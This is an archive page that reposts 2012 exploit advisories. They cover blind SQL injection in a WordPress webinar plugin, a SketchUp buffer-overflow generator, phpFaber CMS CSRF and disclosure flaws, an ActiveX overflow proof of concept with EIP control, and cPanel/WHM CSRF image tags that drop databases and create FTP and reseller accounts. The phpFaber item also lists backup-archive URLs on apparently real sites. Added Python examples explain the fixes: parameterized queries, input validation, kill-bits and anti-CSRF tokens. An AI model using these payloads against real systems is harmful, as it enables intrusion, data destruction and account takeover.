Archive for 29 October 2012

WordPress Easy Webinar Plugin Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability was found in the WordPress Easy Webinar Plugin. Where the flaw occurs and how it is used are as follows.

# Exploit Title: WordPress Easy Webinar Plugin Blind SQL Injection Vulnerability

# Vendor Homepage: www.easywebinarplugin.com

# Date: 10/26/2012

# Author: Robert Cooper (robert.cooper [at] areyousecure.net)

# Tested on: [Linux/Windows 7]

# Vulnerable Parameters: wid=


# Google Dork: allinurl: get-widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]

Note: The HTTP response will read 404, but this is false:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x

This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################

www.areyousecure.net

# Shouts to the Belegit crew
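The advisory above shows the tautology probe (`3' or 'x'='x`) but not why it works or what the fix looks like. The following is an added example, not code from the advisory or from the Easy Webinar plugin: it builds a constructed in-memory SQLite table (the table and column names `widgets`, `wid`, `title` are assumptions, the plugin's real schema is not on the page) and runs the same `wid` value through the string-concatenating query pattern, a parameterized query, and a validated-plus-parameterized query, so the difference in result sets is visible.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory table standing in for the plugin's widget table.

    The real plugin's table and column names are not on the page; 'widgets', 'wid'
    and 'title' are assumptions for this example only.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE widgets (wid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO widgets VALUES (?, ?)",
        [(1, "intro"), (2, "pricing"), (3, "closing")],
    )
    return conn


def get_widget_vulnerable(conn, raw_wid):
    """The flawed pattern: the request parameter is spliced into the SQL text.

    A value such as  3' or 'x'='x  closes the quoted literal and appends a
    tautology, so the WHERE clause matches every row instead of one.
    """
    sql = "SELECT wid, title FROM widgets WHERE wid='" + raw_wid + "'"
    return conn.execute(sql).fetchall()


def get_widget_parameterized(conn, raw_wid):
    """Bound parameter: the value travels separately from the SQL text, so quotes
    and keywords inside it can never change the query's structure. The probe is
    compared as a literal string against an integer column and matches nothing.
    """
    return conn.execute(
        "SELECT wid, title FROM widgets WHERE wid=?", (raw_wid,)
    ).fetchall()


def validate_wid(raw_wid):
    """Return the widget id as an int, or None if the input is not a plain digit string.

    Rejecting anything that is not digits turns every injection probe into a
    refused request before the database is involved at all.
    """
    if isinstance(raw_wid, str) and raw_wid.isdigit():
        return int(raw_wid)
    return None


def get_widget_hardened(conn, raw_wid):
    """Validation plus parameterization: the layered form a maintainer should ship."""
    wid = validate_wid(raw_wid)
    if wid is None:
        return []  # refuse the request; an HTTP 400 would be the web-facing equivalent
    return conn.execute(
        "SELECT wid, title FROM widgets WHERE wid=?", (wid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "3' or 'x'='x"  # the tautology probe quoted in the advisory
    print("vulnerable, probe   :", get_widget_vulnerable(db, probe))
    print("parameterized, probe:", get_widget_parameterized(db, probe))
    print("hardened, probe     :", get_widget_hardened(db, probe))
    print("hardened, wid=3     :", get_widget_hardened(db, "3"))
```

The concatenating version returns all three rows for the probe, which is exactly the "page loads correctly" signal the advisory describes; the bound-parameter version returns nothing, and the validated version never reaches the database. Note that a 404 status cannot be used to rule out this class of request in logs: the advisory itself points out the status code is misleading, so monitoring should key on the shape of the `wid` value rather than on the response code.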

Google SketchUp 8 – Stack Based Buffer Overflow Vulnerability


#!/usr/bin/perl 
#  
# 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
# 0          _                   __           __       __                         1 
# 1        /' \            __  /'__`\        /\ \__  /'__`\                       0 
# 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1 
# 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0 
# 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1 
# 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0 
# 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1 
# 1                       \ \____/ >> Exploit database separated by exploit       0 
# 0                        \/___/          type (local, remote, DoS, etc.)        1 
# 1                                                                               0 
# 0       [x] Official Website: http://www.1337day.com                            1 
# 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0 
# 0                                                                               1 
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0 
# 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1 
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0 
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 
# 
# Title  : Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability. 
# Author : NuxbieCyber 
# Link   : http://sketchup. 
# Type   : Local. 
# Risk   : Critical. 
# Vendor : Google Inc. 
# Version: Google SketchUp 8. 
 
# Tested On  : Windows XP Service Pack 2 ID 32x. 
# Time & Date: 26 October 2012 - 01:15 PM. 
 
# Execute: perl google-su.pl 
# Open the file BoF.txt with Notepad++, select all, then copy. 
# After copying the whole line, 
# go to Google SketchUp --> Tools --> 3D Text --> Place 3D Text --> paste the line into the field and click Place. 
 
use strict; 
use warnings; 
 
# Build the 31337-byte string of "A" characters that gets pasted into the 3D Text field. 
my $junk = "A" x 31337; 
my $payload = $junk; 
 
# Write the payload to BoF.txt through a lexical filehandle and fail loudly if the file cannot be opened. 
open(my $fh, '>', 'BoF.txt') or die "Cannot open BoF.txt: $!"; 
print $fh $payload; 
close($fh); 
print "cr00ted " . length($payload) . " bytes\n"; 
 
# - Special Thanks: 
# ...:::' 1337day - Inj3ct0r TEAM ':::... 
# BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, 
# , And All Inj3ct0r Fans & All Hacktivist,,, 
 
# NuxbieSec  

phpFaber CMS Multiple Vulnerabilities


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: phpFaber CMS Multiple Vulnerabilities 
# Date: 2012-10-24 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.phpfaber.com/files/phpfaber_cms_enc.zip 
# Category: webapps/php 
# Version: 2.4.0 
########################################## 
 
[#] CSRF Change Administrator Settings: 
<html> 
<body onload="document.form0.submit();"> 
<form method="POST" name="form0" action="http://[target]/cms_admin/index.php?page=adm"> 
<input type="hidden" name="name" value="admin2"> 
<input type="hidden" name="email" value=""> 
<input type="hidden" name="login" value="adm"> 
<input type="hidden" name="pwd" value="passw0rd"> 
<input type="hidden" name="pwd2" value="passw0rd"> 
</form> 
</body> 
</html> 
 
 
[#] Database Disclosure: 
http://host/cms_content/backup/[year-month-day]db_name.zip 
# Example: 
http://www.afzarazma.com/fa/cms_content/backup/[10-06-08]afzarazm_fadb.zip 
http://www.wispkhan.com.au/cms_content/backup/[12-01-14]entire_site.zip 
 
 
[#] Full Path Disclosure: 
# PoC 
POST /cms_admin/index.php?page=login HTTP/1.1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: ar,en-us;q=0.7,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 
 
login=adm&pwd[]=aaaaa&go=Login 
 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team
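The Full Path Disclosure request above works because `pwd[]=aaaaa` makes PHP populate `$_POST['pwd']` with an array rather than a string; a string function then emits a warning that, with `display_errors` on, includes the script's absolute path. The following is an added example, not code from the advisory or from phpFaber: it mirrors PHP's bracket rule when decoding a form body and then enforces that login fields are non-empty scalars, which is the check that stops the array ever reaching a string function. The field names `login` and `pwd` come from the advisory's request; the bodies are constructed.

```python
from urllib.parse import parse_qsl


def parse_form_like_php(body):
    """Decode a urlencoded body the way PHP fills $_POST.

    PHP turns  pwd[]=aaaaa  into  $_POST['pwd'] = ['aaaaa']  (a list, not a string).
    This helper mirrors that rule so the validator below sees the same shapes PHP
    would see. Nested keys such as a[b][c] are out of scope for this example.
    """
    fields = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("[]"):
            name = key[:-2]
            if not isinstance(fields.get(name), list):
                fields[name] = []
            fields[name].append(value)
        else:
            fields[key] = value
    return fields


def validate_login_fields(fields, required=("login", "pwd")):
    """Return (ok, reason). Every required field must be a non-empty string.

    Refusing non-scalar values here means a string function is never handed an
    array, so the warning that leaks the script path is never produced.
    """
    for name in required:
        value = fields.get(name)
        if value is None:
            return False, f"{name}: missing"
        if not isinstance(value, str):
            return False, f"{name}: expected a scalar, got {type(value).__name__}"
        if value == "":
            return False, f"{name}: empty"
    return True, "ok"


def check_login_body(body):
    """Parse and validate one request body."""
    return validate_login_fields(parse_form_like_php(body))


# Constructed bodies: the first is the probe from the advisory, the second a normal login.
PROBE_BODY = "login=adm&pwd[]=aaaaa&go=Login"
NORMAL_BODY = "login=adm&pwd=s3cret&go=Login"

if __name__ == "__main__":
    for body in (PROBE_BODY, NORMAL_BODY):
        print(body, "->", check_login_body(body))
```

The same scalar check belongs in front of every field a PHP handler passes to `md5()`, `strlen()`, `trim()` or a database escape function; independently of it, `display_errors` should be off in production so that any warning that does slip through is logged rather than returned to the client.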

Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Vulnerabilities



=============================================================================================
 FILE INFO:
=============================================================================================
 Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Remote Vulnerabilities

 File:                     PrivAgent.ocx
 InternalName:             PrivAgentAx
 OriginalFilename:         PrivAgent.ocx
 FileVersion:              2.0.0.0
 FileDescription:          PrivAgent ActiveX Control
 Product:                  Privilege
 ProductVersion:           02.0
 Debug:                    False
 Patched:                  False
 PreRelease:               False
 PrivateBuild:             True
 SpecialBuild:             False
 Language:                 English (United States)
 MD5 hash:                 c96dfc282b6bdc177abd076a9bb94933
=============================================================================================
 OBJECT SAFETY REPORT:
=============================================================================================
 CLSID:                    {09F68A41-2FBE-11D3-8C9D-0008C7D901B6}
 ProgID:                   PrivAgentAx.PrivAgent.1
 Description:              PrivAgent Class
 RegKey Safe for Script:   True
 RegKey Safe for Init:     True
 Implements IObjectSafety: False
=============================================================================================
 TESTED ON:
=============================================================================================
 Windows XP Professional SP3
 Windows 7 Professional SP3
=============================================================================================
 DOWNLOADABLE FROM:
=============================================================================================
 ftp://ftp.aladdin.com//pub/privilege/activex2002.zip
=============================================================================================
 BUG INFO:
=============================================================================================
 This ocx seems to be really poorly coded. I've found so many errors that I felt too choosy
 (yes Mrs. Elsa Fornero, I AM choosy and I AM proud of it) to test any other method.
 Below there's a list of stack-based buffer overflows, insecure file downloads and a proof
 of concept which exploits a good old fashioned (or trivial, if you like) stack based
 buffer overflow, triggered simply by passing to the "ChooseFilePath" method a string longer
 than 268 bytes. In this case, after a memory read exception, we are in full control of
 EIP.
 Here is the list of vulnerable methods; guess which ones are vulnerable to arbitrary
 file download? 🙂
 
 #1
 Function DownloadLicense (
        ByVal sURL  As String , 
        ByVal sPath  As String , 
        ByVal bInstall  As Boolean 
 )  As Long

 #2
 Function ChooseFilePath (
        ByVal sFileName  As String 
 )  As String

 #3
 Function InstallLicense (
        ByVal szLicensePath  As String 
 )  As Long

 #4
 Function InstallPrivilege (
        ByVal szInstFilePath  As String 
 )  As Long

 #5
 Function DownloadPrivilege (
        ByVal szURL  As String , 
        ByVal szTargetDir  As String , 
        ByVal bInstall  As Boolean 
 )  As Long

 #6
 Function InstallDevExt (
        ByVal szDevExtPath  As String 
 )  As Long

 #7
 Function DownloadDevExt (
        ByVal szURL  As String , 
        ByVal szTargetPath  As String , 
        ByVal bInstall  As Boolean 
 )  As Long
=============================================================================================
 PROOF OF CONCEPT:
=============================================================================================

<html>
 <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>
  <script language = 'vbscript'>
   buffer    = String(268, "A")
   getEIP    = unescape("bbbb")
   buffer_2  = "CCCCCCCC"
   exception = unescape("%5A%0B%02%10") '0x10020B5A pop ESI-pop-ret from PrivAgent.ocx
   buffer_3  = unescape("EEEE" + String(2712, "F"))

   test.ChooseFilePath buffer + getEIP + buffer_2 + exception + buffer_3
  </script>
</html>

=============================================================================================
 CRASH DUMP:
=============================================================================================
 0:005> g
 WARNING: Continuing a non-continuable exception
 (1138.1304): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=076886d8 ecx=00385f70 edx=086dc628 esi=0253cfa4 edi=0253cd24
 eip=62626262 esp=0253cce4 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 62626262 ??              ???
=============================================================================================
 FIX:
=============================================================================================
 Set kill-bit to stop the activeX control
=============================================================================================
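The FIX section says only "set kill-bit". The kill-bit is the `0x400` flag in the `Compatibility Flags` DWORD under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`; once set, Internet Explorer refuses to instantiate the control regardless of its "safe for scripting" registry marks. The following is an added example, not code from the advisory or from Aladdin: it produces a `.reg` file that sets the bit for the PrivAgent CLSID quoted in the OBJECT SAFETY REPORT, and parses `reg export` style text to audit whether the bit is already set. The sample export text and the second CLSID in it are constructed.

```python
import re

# Documented kill-bit flag in the "Compatibility Flags" DWORD.
KILL_BIT = 0x00000400
ACTIVEX_COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
PRIVAGENT_CLSID = "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}"  # from the advisory's OBJECT SAFETY REPORT


def killbit_reg_file(clsid, key=ACTIVEX_COMPAT_KEY):
    """Return the text of a .reg file that sets the kill-bit for one CLSID."""
    return (
        "Windows Registry Editor Version 5.00\r\n"
        "\r\n"
        f"[{key}\\{clsid.upper()}]\r\n"
        f'"Compatibility Flags"=dword:{KILL_BIT:08x}\r\n'
    )


def compatibility_flags(reg_text, clsid, key=ACTIVEX_COMPAT_KEY):
    """Parse .reg text (as written by `reg export`) and return the control's
    Compatibility Flags as an int, or None if the CLSID has no such value."""
    wanted = f"[{key}\\{clsid}]".upper()
    in_section = False
    flags = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.upper() == wanted  # section headers are case-insensitive
            continue
        if in_section:
            m = re.fullmatch(r'"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})', line)
            if m:
                flags = int(m.group(1), 16)
    return flags


def killbit_set(reg_text, clsid, key=ACTIVEX_COMPAT_KEY):
    """True only if the CLSID has a Compatibility Flags value with the kill-bit on."""
    flags = compatibility_flags(reg_text, clsid, key)
    return flags is not None and bool(flags & KILL_BIT)


# Constructed export: PrivAgent has no entry yet; a made-up second control already has the bit.
SAMPLE_EXPORT = "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    f"[{ACTIVEX_COMPAT_KEY}\\{{00000000-0000-0000-0000-000000000001}}]",
    '"Compatibility Flags"=dword:00000400',
    "",
])

if __name__ == "__main__":
    print("PrivAgent kill-bit already set:", killbit_set(SAMPLE_EXPORT, PRIVAGENT_CLSID))
    with open("privagent-killbit.reg", "w", newline="") as fh:
        fh.write(killbit_reg_file(PRIVAGENT_CLSID))
    print("wrote privagent-killbit.reg")
```

Import the generated file from an elevated prompt with `reg import privagent-killbit.reg`, and audit with `reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" ax.reg` (the export is UTF-16, so open it with `encoding="utf-16"` before passing it to `compatibility_flags`). On 64-bit Windows a 32-bit control is governed by the same key under `HKLM\SOFTWARE\Wow6432Node\...`; pass that path as `key` to cover both views.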


cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Vulnerabilities

A CSRF vulnerability was found in cPanel 11.32.5 (build 11) 11.32.5.11. The exploit for the flaw and its explanations are as follows.

========== 
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
Vulnerability: CSRF 
Vendor: cpanel.net 
========== 
 
===================================================================== 
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
 
Aka: Cpanel Accelerated 2 
via 
WHM 11.32.5 (build 11) 
 
===================================================================== 
 
CSRF: Drop Database: (Method $_GET) 
 
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" height="0" width="0" /> 
 
Here we are going to drop database named: armenian_music 
===================================================================== 
 
CSRF: Drop mysql user: (Method $_GET) 
 
 
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" height="0" width="0" /> 
Here we are going to drop mysql user named: armenian_adserver )) 
 
===================================================================== 
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET) 
Changing email address to:  
 
<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" height="0" width="0" /> 
 
 
===================================================================== 
 
CSRF adding FTP account: 
 
username: akastep 
password: akastep 
host is target host. 
 
 
<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" height="0" width="0" /> 
 
===================================================================== 
 
 
CSRF Drop FTP account: 
 
Deletes existent ftp account named: axaxa 
 
<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" height="0" width="0" /> 
 
===================================================================== 
 
 
CSRF change Apache handler: 
 
(Parse .gif file as php script) 
 
<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" height="0" width="0" /> 
===================================================================== 
 
 
CSRF Delete handler: 
 
 
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" height="0" width="0" /> 
 
 
===================================================================== 
 
WHM 11.32.5 (build 11) 
 
CSRF: Add Reseller setup 
with domain: owned.com 
username: owned111 
password: MYVERYSTRONGGOESHERE 
And contact email:  
 
<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=&dbuser=owned&msel=n,y,1,n,x3,1,1,1,1,1,1000,n,0,0,default,en,,,Reseller setup&pkgname=&featurelist=default&;quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&amp;cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" height="0" width="0" /> 
 
================================================
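Every cPanel/WHM item above relies on one property: a state-changing action (drop a database, add an FTP account, add a reseller) is reachable by a plain GET that a hidden `<img>` on any site can trigger, with no secret the attacker cannot guess. The phpFaber CSRF earlier on this page is the POST variant, driven by an auto-submitting form. The following is an added example, not code from either advisory or from cPanel or phpFaber: a server-side gate for state-changing requests that refuses GET outright, requires a session-bound anti-CSRF token compared in constant time, and treats a mismatching `Origin`/`Referer` as a second, independent rejection. The hostname, session id, secret and request dictionaries are constructed; the parameter names `db`, `login`, `pwd` come from the advisories.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed server secret; a real deployment loads it from configuration, never from code.
SERVER_SECRET = secrets.token_bytes(32)
SITE_HOST = "panel.example"  # assumed hostname of the protected application


def issue_csrf_token(session_id):
    """Token bound to one session: HMAC-SHA256 over the session id under the server secret.

    The server never has to store the token; it can recompute it from the session and
    the secret, and a token stolen from another session will not verify for this one.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_change(request, session_id, site_host=SITE_HOST):
    """Decide whether a state-changing request (drop DB, add account, ...) may proceed.

    request is a dict with 'method', 'headers' and 'params'. Returns (allowed, reason).
    """
    if request["method"].upper() != "POST":
        # An <img src=...> can only ever issue a GET: refusing GET for state changes
        # removes the image-tag attack class entirely.
        return False, "state-changing action requested with GET"

    token = request["params"].get("csrf_token", "")
    if not token:
        return False, "anti-CSRF token missing"
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, "anti-CSRF token does not match session"

    # Defence in depth: if the browser says where the request came from, it must be us.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source:
        host = urlsplit(source).hostname
        if host != site_host:
            return False, f"cross-site request from {host}"
    return True, "ok"


SESSION = "sess-constructed-1"

# 1. cPanel-style <img> trick: the victim's browser fetches the URL with a plain GET.
IMG_TAG_REQUEST = {
    "method": "GET",
    "headers": {"Referer": "http://attacker.example/page.html"},
    "params": {"db": "armenian_music"},
}

# 2. phpFaber-style auto-submitting form: a POST, but cross-origin and without our token.
FORGED_FORM_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example"},
    "params": {"name": "admin2", "login": "adm", "pwd": "passw0rd", "pwd2": "passw0rd"},
}


def legitimate_request():
    """3. Same-origin POST carrying the token the server issued for this session."""
    return {
        "method": "POST",
        "headers": {"Origin": f"http://{SITE_HOST}"},
        "params": {"db": "armenian_music", "csrf_token": issue_csrf_token(SESSION)},
    }


if __name__ == "__main__":
    for label, req in (("img tag", IMG_TAG_REQUEST),
                       ("forged form", FORGED_FORM_REQUEST),
                       ("legitimate", legitimate_request())):
        print(f"{label:12}: {check_state_change(req, SESSION)}")
```

The GET rejection alone neutralises every `<img>`-based item in this advisory, since an image element cannot issue a POST; the token is what stops the phpFaber-style hidden form, and the `Origin` check catches a forged POST even if a token leaks. Marking the session cookie `SameSite=Lax` or `Strict` adds a browser-side layer for clients that support it, but the server-side token remains the control that does not depend on the client.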